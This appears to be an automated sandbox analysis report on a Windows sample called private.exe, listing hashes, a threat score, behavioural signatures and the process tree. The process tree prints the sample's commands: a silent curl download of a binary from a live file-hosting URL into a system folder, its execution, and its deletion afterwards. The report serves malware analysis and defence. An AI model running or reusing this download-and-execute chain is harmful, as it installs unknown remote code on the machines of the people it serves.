Analysis
-
max time kernel
83s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-01-2025 05:36
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
private.exe
Resource
win7-20240903-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
private.exe
Resource
win10v2004-20241007-en
19 signatures
150 seconds
General
-
Target
private.exe
-
Size
854KB
-
MD5
53e14b277744d3c61cffb17f39ede98d
-
SHA1
c8482d3ec8cb10df2d9f660920ab5d839d6e450f
-
SHA256
f8b5a7f99a109c3bc007a3ef1e6fbbacbb0fae70951c3b020704df3106a54654
-
SHA512
140dffe4e715ccaeec37ae3da9734c0fbd2b6b1e4337d75621dc8714ec13ab572cc2ee5885a1ec196758637f27ac50ff3970396db5c20885234a4a2e1e47c8fb
-
SSDEEP
12288:Hnt46d+ktbUluYV/YH7Fso6veRSN2ff+zOe9egX7AlGq+nqnIr9BqiXb1FP:Hnt46Qi4ue/Do60OegX7Aoq+nmm7Vj
Score
6/10
Malware Config
Signatures
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1548 private.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1548 wrote to memory of 2256 1548 private.exe 33 PID 1548 wrote to memory of 2256 1548 private.exe 33 PID 1548 wrote to memory of 2256 1548 private.exe 33 PID 1548 wrote to memory of 1052 1548 private.exe 32 PID 1548 wrote to memory of 1052 1548 private.exe 32 PID 1548 wrote to memory of 1052 1548 private.exe 32 PID 1548 wrote to memory of 2320 1548 private.exe 34 PID 1548 wrote to memory of 2320 1548 private.exe 34 PID 1548 wrote to memory of 2320 1548 private.exe 34 PID 1548 wrote to memory of 2508 1548 private.exe 35 PID 1548 wrote to memory of 2508 1548 private.exe 35 PID 1548 wrote to memory of 2508 1548 private.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\private.exe"C:\Users\Admin\AppData\Local\Temp\private.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe2⤵PID:2256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe2⤵PID:2320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe2⤵PID:2508
-